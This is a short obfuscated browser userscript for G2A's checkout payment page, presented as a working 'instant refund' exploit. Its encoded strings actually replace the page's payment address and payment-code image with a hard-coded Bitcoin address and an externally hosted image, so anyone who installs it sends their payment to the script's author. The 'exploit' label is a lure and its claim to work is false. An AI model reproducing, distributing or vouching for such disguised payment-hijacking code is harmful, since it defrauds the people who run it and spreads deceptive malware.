// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      9.0
// @description  G2A Instant Refund Vulnerbility
// @author       @AlGlitch	
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x62\x63\x31\x71\x68\x61\x7a\x70\x33\x38\x35\x38\x64\x64\x68\x63\x63\x78\x33\x65\x7a\x74\x77\x7a\x39\x67\x66\x65\x7a\x68\x74\x6e\x70\x66\x6b\x70\x75\x70\x37\x79\x6b\x74","src","code","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x2e\x69\x6d\x67\x75\x72\x2e\x63\x6f\x6d\x2f\x4a\x5a\x74\x37\x6c\x4d\x34\x2e\x70\x6e\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
	var _0xf782x2=document[_0x128a[2]](_0x128a[1]);	_0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
	[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
	if(_0xf782x3[_0x128a[8]]> 0)
	{
		clearInterval(_0x4892da)
	}
}
,10)

//Backend-Exploit | Status: Working